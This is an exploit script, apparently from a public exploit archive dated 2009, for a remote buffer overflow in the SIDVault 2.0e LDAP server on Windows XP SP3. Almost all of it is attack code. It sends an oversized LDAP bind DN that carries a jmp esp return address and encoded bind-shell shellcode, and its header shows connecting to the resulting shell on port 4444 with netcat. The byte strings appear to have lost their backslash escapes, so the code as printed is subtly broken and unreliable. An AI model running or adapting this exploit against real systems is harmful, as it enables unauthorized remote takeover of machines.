
# Title : SIDVault 2.0e Windows Remote Buffer Overflow Exploit
# Published : 2009-09-03
# Author : Blake


#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys, ldap

print "n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"

if len(sys.argv)!=2:
	print "[*] Usage: %s <ip>" % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]

# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed 
# EXITFUNC=seh, LPORT=4444

shellcode = (
"x89xe1xd9xe1xd9x71xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b"
"x4fx4bx4fx45x30x4cx4bx42x4cx46x44x46x44x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx43x35x43x48x45x51x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31"
"x4ax4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43x37"
"x49x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx50x54x46x44x51x38x43x45x4bx55x4cx4bx51x4f"
"x47x54x43x31x4ax4bx45x36x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4cx49x42x4cx47x54x45x4cx43x51x48x43x46x51x49"
"x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51"
"x4ex43x58x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x49x46x42x46x46x33x43x56x42x48x47x43x47x42x42"
"x48x42x57x44x33x46x52x51x4fx46x34x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4cx49x4bx55x42x46x4dx51x4ax4dx43x38"
"x45x52x50x55x43x5ax43x32x4bx4fx48x50x43x58x48"
"x59x44x49x4bx45x4ex4dx46x37x4bx4fx48x56x46x33"
"x51x43x51x43x50x53x46x33x50x43x50x53x51x53x50"
"x53x4bx4fx4ex30x45x36x42x48x42x31x51x4cx43x56"
"x46x33x4bx39x4dx31x4ax35x45x38x4ex44x45x4ax42"
"x50x49x57x51x47x4bx4fx49x46x43x5ax44x50x50x51"
"x46x35x4bx4fx4ex30x42x48x4ex44x4ex4dx46x4ex4d"
"x39x46x37x4bx4fx49x46x50x53x51x45x4bx4fx4ex30"
"x45x38x4ax45x51x59x4cx46x51x59x46x37x4bx4fx4e"
"x36x50x50x50x54x46x34x46x35x4bx4fx48x50x4dx43"
"x43x58x4ax47x42x59x48x46x44x39x50x57x4bx4fx4e"
"x36x46x35x4bx4fx48x50x43x56x42x4ax43x54x45x36"
"x43x58x45x33x42x4dx4cx49x4ax45x42x4ax46x30x50"
"x59x47x59x48x4cx4cx49x4ax47x42x4ax50x44x4cx49"
"x4ax42x46x51x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex51x52x46x4cx4cx53x4cx4dx42x5ax46x58"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x44"
"x56x4bx4fx43x45x50x44x4bx4fx4ex36x51x4bx50x57"
"x50x52x50x51x46x31x50x51x42x4ax45x51x46x31x50"
"x51x46x35x46x31x4bx4fx48x50x45x38x4ex4dx4ex39"
"x43x35x48x4ex50x53x4bx4fx48x56x43x5ax4bx4fx4b"
"x4fx50x37x4bx4fx4ex30x4cx4bx50x57x4bx4cx4dx53"
"x49x54x42x44x4bx4fx4ex36x46x32x4bx4fx4ex30x43"
"x58x4ax50x4cx4ax45x54x51x4fx46x33x4bx4fx48x56"
"x4bx4fx4ex30x41x41")

junk = "x41" * 1024		# junk buffer
ret = "x33xbfx96x7c"	# jmp esp 7C96BF33 Shell32.dll XP SP3
nops = "x90" * 10		# nop sled
sc = shellcode			# shellcode
junk2 = "x42" * 2375		# 3071 - 696 = 2375 junk

print "[+] Sending payload"

l = ldap.open(host)
l.simple_bind("dc=" + junk + ret + nops + sc + junk2, "x42" * 256)

print "[+] Check port 4444 for shelln"
